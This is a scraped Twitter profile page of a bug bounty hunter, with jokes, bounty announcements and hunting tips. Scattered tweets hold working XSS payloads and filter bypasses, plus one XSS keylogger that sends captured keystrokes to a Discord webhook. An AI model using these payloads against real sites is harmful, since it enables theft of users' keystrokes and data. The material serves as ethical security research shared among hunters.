renniepak @renniepak Twitter profile

Last Seen Profiles

@stw_pdg

@petrstepanek

@Cinema_Joe23

@LuisVel91765229

@whiptailed

@AlphaSolitude

@mailonsundaySTL

@RezzyAU

@bron1tp

@Kiraak417

@PermianLigand

@une_Ackerman

@john_drescher

@CahillT1

@TheSmollestWah

@NawtiSmile

@munira14003

@iambucketboi

@HinsOfficial

@CoachMyers80

@Zeeyadx

@what_aJee

@bbaltong

@MeetCloe

@KyRailMuseum

@stra3e

@Mellow_Xxi

@RossSwim

@PatchesGOAT

@wonpilimoonie

@CoachKotelnicki

@brystondixon28

@activesplooger

@Charlottegshore

@hami_iqbal

@pasutri_sda

renniepak

@renniepak

1 year

I've created a javascript bookmarklet that will extract all endpoints (starting with /) from your current DOM and from all the all the external script sources embedded on the page. You can find it here, if you want to try it out: #bugbountytips

31

383

1K

renniepak

@renniepak

2 years

Yay! My report was accepted as Critical. I found a bug that would let me fetch any users password reset link. Since I don't often share a lot of my approach, I'll do a little write-up. 🧵1/x

renniepak

@renniepak

2 years

Just submitted a bug that I rechecked 10 times because I couldn't believe it worked.

4

0

92

21

154

806

renniepak

@renniepak

3 years

How to raise the impact of your HTML injection: <font color="red">ERROR 1064 (42000): You have an error in your SQL syntax; BOOM!

29

85

702

renniepak

@renniepak

4 years

Pretty happy with this one-liner to extract endpoints from JavaScript files: cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u #bugbountytips

10

351

696

renniepak

@renniepak

3 years

This is my new favorite XSS payload: "><svg><animate onbegin=prompt(document.domain) attributeName=x dur=1s>

7

166

599

renniepak

@renniepak

3 years

I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I'M A GENIUS! I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking.

12

70

595

renniepak

@renniepak

3 years

TIL: You can serve a XSS payload from a XML file: xss.xml: <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html=""> <html:script>prompt(document.domain);</html:script> </html> #bugbountytips #bugbounty

8

177

518

renniepak

@renniepak

1 year

Yay, I was awarded a $50,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder 🤯🤯🤯

HackerOne profile - renniepak

-

hackerone.com

38

12

518

renniepak

@renniepak

5 days

Just found out you can import external scripts with Javascripts import() without quotes by just using a regex?

10

97

584

renniepak

@renniepak

1 year

🎉 Celebrating One Year as a Full-Time Bug Bounty Hunter! 🎉 🔒 It's been an incredible journey, and today marks the one-year anniversary of my full-time bug bounty hunting adventure! 🕵️‍♂️ As I reflect on the past year, I wanted to share some exciting statistics and highlights…

47

32

481

renniepak

@renniepak

2 years

Noob: "I am a pro!" Pro: "I am a noob!" #bugbountytips

17

51

460

renniepak

@renniepak

27 days

From now on I'll include confetti in my XSS POCs.

14

58

456

renniepak

@renniepak

3 years

OMG! This trick will get you XSS on any domain!!!1! #fakebugbountytips

13

106

401

renniepak

@renniepak

2 years

I'll give away a €20,- voucher for the @intigriti swag shop to a random person that interacts with this tweet. GO!

128

30

389

renniepak

@renniepak

1 year

I'm having an insane week.... Never found RCE before in my life this week. This week I've found 5! 🤯🤯🤯🤯

22

11

387

renniepak

@renniepak

1 year

XSS Payload - Discord Keylogger <img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

10

77

350

renniepak

@renniepak

4 years

#bugbountytip

18

24

326

renniepak

@renniepak

2 months

A quick way to find "all" paths for Next.js websites: console.log(__BUILD_MANIFEST.sortedPages)

6

61

313

renniepak

@renniepak

1 year

If you DM me, please first check if one of the following answers your question: 1. I am not your "bro" 2. I don't want to be your "mentor", nor do I want you as an "assistant" 3. Google "How to get started in bug bounty" 4. I strictly do ethical hacking -> No? Feel free to DM🙂

39

19

285

renniepak

@renniepak

8 months

Recently encountered a challenging Stored XSS case: - No dots - No parentheses - No plus - No single quote - No space - Max 35 characters - Unlimited amount of payloads can be stored - Every payload is reflected twice @0xH4rmony and I came up with this:

11

70

280

renniepak

@renniepak

2 years

Got some news to share: I've quit my job to become a full-time #bugbounty hunter! Have some time left at my current job and will first take a long vacation, so I'll start around summer! I'm simultaneously super excited and immensely terrified, but I'm looking forward to it!🙂

29

6

262

renniepak

@renniepak

6 months

Found this interesting DOM XSS case yesterday:

5

31

260

renniepak

@renniepak

2 years

Pro #bugbountytips : If you find 5 xsses (for example), report one, wait for it to be accepted/resolved, then report the next one(s). Prevents the "these all have the same root cause" trap.

11

24

250

renniepak

@renniepak

2 years

6

47

225

renniepak

@renniepak

2 years

Imagine selflessly maintaining an open source project for years, struggling to get sponsors although all the major corporates are using your software. Than a bug gets disclosed and a bunch of bounty hunters who copy-paste a POC make more money in days than you ever did. #log4j

8

40

229

renniepak

@renniepak

8 months

I've made over 100k on XSS vulnerabilities. Here's how I did it: 🧵

8

25

230

renniepak

@renniepak

1 year

Having some fun with weaponising XSS payloads. This example will prompt MetaMask to connect to the site and initiate a transaction to transfer all of your $ETH.

16

30

217

renniepak

@renniepak

2 years

Today was my last day working as an ethical hacker @bol_com . Tomorrow I'll start my journey trying to make it as a full-time bug bounty hunter! Excited but also a bit anxious, but I'm sure it's going to be a great experience!

30

5

208

renniepak

@renniepak

1 year

My 5000th follower will receive a Professional Bug Bounty Certificate completely free of charge.

19

8

194

renniepak

@renniepak

4 years

Need a short domain for your XSS payload, but don't want to pay top dollar? Register a domain that can be written with alternate Unicode characters: For example ㎉.℡ (3 chars) will be normalized to . Cheat sheet: #bugbountytips

1

51

193

renniepak

@renniepak

3 years

I'll be giving away a €20,- voucher for the @intigriti swag store to the person who replies to this tweet with the best #bugbountytip ! Winner will be announced this Sunday (whenever I feel like it 😀)

70

35

187

renniepak

@renniepak

5 days

Another fun one to bypass certain blacklists is optional chaining: alert?.()

4

31

206

renniepak

@renniepak

2 months

Yay, I was awarded a $7,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder Best HTML injection ever! 😅

HackerOne profile - renniepak

-

hackerone.com

9

5

181

renniepak

@renniepak

8 months

My bug bounty automation flow: 1. Build a thing. 2. Let it run all night. 3. Wake up to realize it stopped due to some error after 15 min. 4. Repeat.

11

13

177

renniepak

@renniepak

3 years

4

27

167

renniepak

@renniepak

21 days

If you want a super quick way to create a wordlist of the current page you are visiting, you can use this Javascript Bookmarklet.

5

31

167

renniepak

@renniepak

2 years

A small thread on how an out-of-scope (or lower tier asset) vulnerability can still have an in-scope impact: #bugbountytips 🧵 1/x

5

35

156

renniepak

@renniepak

3 years

I normally find a lot of XSS. Somehow I have a feeling for spotting that, and while that is great, I would love to find more impactful bugs. I decided to focus on SQL Injection this weekend and actually found 2! My first ever SQL injection bug bounty reports!

13

5

154

renniepak

@renniepak

3 months

I like how browsers don't give a shit. <script/src=//㎠.℡></script> Fine! <script src=" https://r<tab>enni<new-line>"></script> Sure!

3

30

152

renniepak

@renniepak

2 years

3

13

142

renniepak

@renniepak

1 year

Uncomfortable (unpopular?) opinion: If you need to DM someone with "how to get started in bug bounty" despite the abundance of information out there, bug bounty might not be your thing.

8

17

139

renniepak

@renniepak

1 year

If you're having troubles fingerprinting what tech stack a bug bounty target is using, checkout their careers page for engineering positions. They'll probably list out exactly what they are using for you :) #bugbountytips

8

16

142

renniepak

@renniepak

2 years

Thanks for the swag! @DailySwig @PortSwigger

7

4

135

renniepak

@renniepak

2 years

I think 70% of my knowledge about hacking/security I've learned in the past 2 years, by reading stuff on the internet and experimenting with it in real life.

7

10

132

renniepak

@renniepak

2 years

Goals: report 1 valid smart contract vulnerability on @immunefi this year.

15

5

128

renniepak

@renniepak

3 years

Achievement unlocked: I duped myself. #BugBounty

12

1

128

renniepak

@renniepak

1 year

Scored a new CVE and great bounty at @grafana ! You can read their Security Advisory here:

Grafana security release: Fixes for CVE-2023-1410

Today we are releasing Grafana 9.4.7, 9.3.11, 9.2.15, and 8.5.22, which include security fixes. If you are affected, we recommend that you install newly released versions.

grafana.com

3

10

123

renniepak

@renniepak

3 years

🥳🥳🥳 Just passed 1k reputation on @intigriti 🥳🥳🥳

10

0

123

renniepak

@renniepak

3 years

4

5

123

renniepak

@renniepak

1 year

Ok, to make it up to you, let's do a REAL giveaway this time Follow, like, retweet and comment with your best bug bounty joke or meme. The winner will be picked in 24 hours and will receive a €50 voucher for @intigriti 's swag shop:

Intigriti's swag shop

Discover Intigriti's swag! Elevate your hacker style and represent your favorite brand. Check out elite clothes, accessories & other gear."

swag.intigriti.com

45

37

122

renniepak

@renniepak

2 years

What's the best bug you ever found? I'll start: ATO of an admin account that gave me access to all tenants on the host. Found an endpoint in the js source. It returned STATIC access tokens of all users of my tenant including the admin account. Fun fact: admin token was "asfdsf".

34

18

124

renniepak

@renniepak

3 years

SSTI polyglot. (work in progress) - Apache Velocity - EJS - Freemarker - Jinja2 - Liquid - Smarty - Twig #bugbountytips

2

42

124

renniepak

@renniepak

2 years

Yay, I was awarded a -$xxxxx bounty by the tax authorities!

4

1

115

renniepak

@renniepak

2 years

I'm gonna sell my bug bounty reports as NFTs, making sure I'll never face another dupe in my life.

7

5

110

renniepak

@renniepak

2 years

Full time bug hunters: how many times per week do you have an existential crisis?

18

5

112

renniepak

@renniepak

3 years

Proud to be up there with these legends.

5

0

113

renniepak

@renniepak

1 year

A miracle happened today: I setup a Android Emulator and imported the Burp Certificate and everything worked first try. 🤯

17

1

112

renniepak

@renniepak

2 months

To make your XSS less "suspicious", you can hide your payload by updating the URL path with a "valid" url.

0

6

111

renniepak

@renniepak

3 years

That feeling when you find DOM XSS.

3

5

111

renniepak

@renniepak

2 years

Did you know, you can be a professional bug bounty hunter without ever having reported a critical/P1 on HackerOne/BugCrowd? 🫡

9

5

110

renniepak

@renniepak

2 years

Wanna see some magic? 👇

5

4

108

renniepak

@renniepak

3 years

HTTP/1.1 200 OK 404 Not Found 🤯

7

3

105

renniepak

@renniepak

3 years

🎉 Yay! Just passed 2000 reputation points on @intigriti !

7

0

107

renniepak

@renniepak

1 year

What was the best bug you found in 2022? Why was it the best?

35

12

106

renniepak

@renniepak

2 years

<NoteToSelf> #BugBountyTips Write a report that is reproducible, not only by the program, but also by the platforms triager. Triagers constantly need to switch contexts and therefore you can't expect them to have the same inside knowledge you and the program have. </NoteToSelf>

4

17

100

renniepak

@renniepak

2 years

Always add terms like "0-click" to your bug bounty report titles to maximize impact. "0-click missing SPF records. 💥BOOM!" #bugbountytips

10

7

101

renniepak

@renniepak

7 months

Had a blast speaking to @Rhynorater and @0xteknogeek on @ctbbpodcast ! Thanks for having me! If you want to find out if I actually have a face and XSS tattoo, go check out the podcast:

Intigriti LHE Recap With renniepak (Ep. 42)

Episode 42: In this episode of Critical Thinking - Bug Bounty Podcast, we're live from a hacking event in Portugal, and joined by the extremely talented René...

www.youtube.com

5

15

94

renniepak

@renniepak

2 years

A fun way to "mitigate" XSS would be hosting a (image) file on httpx://domain.tld/x

5

12

93

renniepak

@renniepak

2 years

Just submitted a bug that I rechecked 10 times because I couldn't believe it worked.

4

0

92

renniepak

@renniepak

3 years

Weird alerts. (0,alert)(); alert?.(); Let's get weird: (0,alert)?.()?.(); (null,alert)``?.(); HappyWeekend:('🤖',alert)()?.(); #bugbounty

1

34

93

renniepak

@renniepak

2 months

When trying to bypass custom WAFs, that mostly blacklist certain words/characters, AUREBESH.js has worked multiple times for me.

Martin Kleppe

@aemkei

8 years

Releasing… /// AUREBESH.js → Translate JavaScript to other writing systems! # ΔYロIᗐコΞ 👾

6

73

173

1

18

94

renniepak

@renniepak

5 months

Finally, a job that matches my level of knowledge of cryptography.

4

7

91

renniepak

@renniepak

11 months

Life is tough as a bug bounty hunter.

3

1

89

renniepak

@renniepak

9 months

Pretty nifty way to (potentially) find new subdomains. I wonder if any bug hunter use this in their recon automation and if cracking the hashes is worth it?

GitHub - anonion0/nsec3map: a tool to enumerate the resource records of a DNS zone using its DNSSEC...

a tool to enumerate the resource records of a DNS zone using its DNSSEC NSEC or NSEC3 chain - anonion0/nsec3map

github.com

0

13

86

renniepak

@renniepak

2 years

I love that when you use this XSS payload by @garethheyes , it alerts "Uncaught XSS" which is kind of fitting. var{haha:onerror=alert}=0;throw 'XSS' httpx://portswigger-labs.net/xss/xss.php?x=%3Cscript%3Evar{haha:onerror=alert}=0;throw%20%27XSS%27%3C%2Fscript%3E&context=html

2

17

86

renniepak

@renniepak

2 years

Respect to all beginners in #bugbounty out there. Currently focussing on smart contract hacking, which is totally new for me. Makes me feel like a beginner again, with all the worries, imposter syndrome etc. But let's keep learning and keep up our persistence! 💪

5

89

renniepak

@renniepak

1 year

How to DDoS a site for free: 1. Run a bug bounty program. 2. Send out an update that is now in scope. Done! Follow me for more quality content!

6

3

88

renniepak

@renniepak

1 year

Can you get XSS in this situation? 🤔

12

8

86

renniepak

@renniepak

2 years

"It's all about impact!" "What? ... Oh it's XSS? No that's just medium"

6

87

renniepak

@renniepak

3 years

Next time a VDP asks how you would like to be appear in their Hall of Fame, pick: "><img src onerror=alert('username')> #bugbountytips #InfiniteFame

0

9

85

renniepak

@renniepak

5 months

Just scored a reward @intigriti , check my profile: #HackWithIntigriti $8k for another Stored XSS in a NFT.

renniepak - Intigriti

Intigriti offers bug bounty and agile penetration testing solutions powered by Europe's #1 leading network of ethical hackers.

app.intigriti.com

8

0

85

renniepak

@renniepak

8 months

Why make a $30.000 bounty once when you can make a $300 bounty ten times. Wait...

9

2

84

renniepak

@renniepak

8 months

Paste "><script>alert()</script> everywhere.

8

3

84

renniepak

@renniepak

1 year

"Only 2 requests per second are allowed." I broke the policy just by loading the page...

4

1

83

renniepak

@renniepak

3 years

@intigriti @SecureOwl

3

5

80

renniepak

@renniepak

1 year

Gotta give @Hacker0x01 triage my compliments! Submitted 3 reports today that were all triaged within 15 minutes! 🔥🔥🔥

8

2

81

renniepak

@renniepak

2 years

Sometimes you're stuck on an xss. You've checked all the cheat sheets, it's seem vulnerable but you just can't make it work. Most of the time, your "xss" (in some variation) is equal to one of Portswiggers "impossible labs". Great resource.

Documenting the impossible: Unexploitable XSS labs

Have you ever found some risky behavior, but couldn't quite prove it was exploitable? Our XSS cheat sheet contains virtually every exploit technique we know of, but what should you do if you can't fin

portswigger.net

0

11

80

renniepak

@renniepak

2 years

Yay! Invited to my first IRL live hacking event. Now I can disappoint everyone in real life!

12

0

77

renniepak

@renniepak

4 years

I made a thing: This page helps you to convert the POST body of a request to a different Content-Type. Some webapps tend to behave differently for different Content-Types. Couldn't (easily) find existing ones that convert to urlencoded. #bugbountytips

3

26

74

renniepak

@renniepak

3 years

I created a JS bookmarklet to quickly fill all input fields (type="text") on a webpage with your favorite XSS payload. Just add it as a bookmark in your browser, click it, BOOM etc. #BugBountyTips ɴᴏᴛ ɢᴜᴀʀᴀɴᴛᴇᴇᴅ ᴛᴏ ᴡᴏʀᴋ 👀

XSS_Bookmarklet.js

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

5

23

73

renniepak

@renniepak

3 years

Uh... Thanks @redbull and @intigriti !!

1

74

renniepak

@renniepak

3 years

#BugBounty is weird. Monday: report SQLi = Duplicate Tuesday: find XSS = OoS Wednesday: F... this. Not hunting today. Get an email: Blind XSS on admin portal. Triaged. 🤷‍♂️

2

3

72

renniepak

@renniepak

3 years

Found 1,2 million XSSes yesterday and all I'll get is a lousy CVE number. Bounty please. 🤪

5

0

71

renniepak

@renniepak

2 years

I just successfully exploited a prototype pollution vulnerability that I wasn't able to exploit before, using DOM Invader! Thank you @PortSwiggerRes and @garethheyes !

Web Security Academy

@WebSecAcademy

2 years

We've got something exciting for you all next week, but in the meantime, why not brush up on your knowledge of prototype pollution - How to use browser APIs for prototype pollution - via @PortSwiggerRes 's recent post.

0

26

91

4

8

74

renniepak

@renniepak

2 years

#BugBounty be like: I report XSS. OOS. "XSS is now in scope" I report XSS. "This is a duplicate". Ok.

6

3

74

renniepak

@renniepak

5 months

This month I found XSS in a couple of third party widgets. According to BuiltWith (combining all of them) around 250k+ sites were/are vulnerable. Guess how much money I made until now.

24

0

72

renniepak

@renniepak

2 years

What a weekend! Really enjoyed my time at #1337UP0622 @intigriti . Finished 7th! 2nd with our team!Scored a critical! But the most valuable part of it all was meeting all those lovely, kind and inspiring people. Thanks all! See you soon hopefully!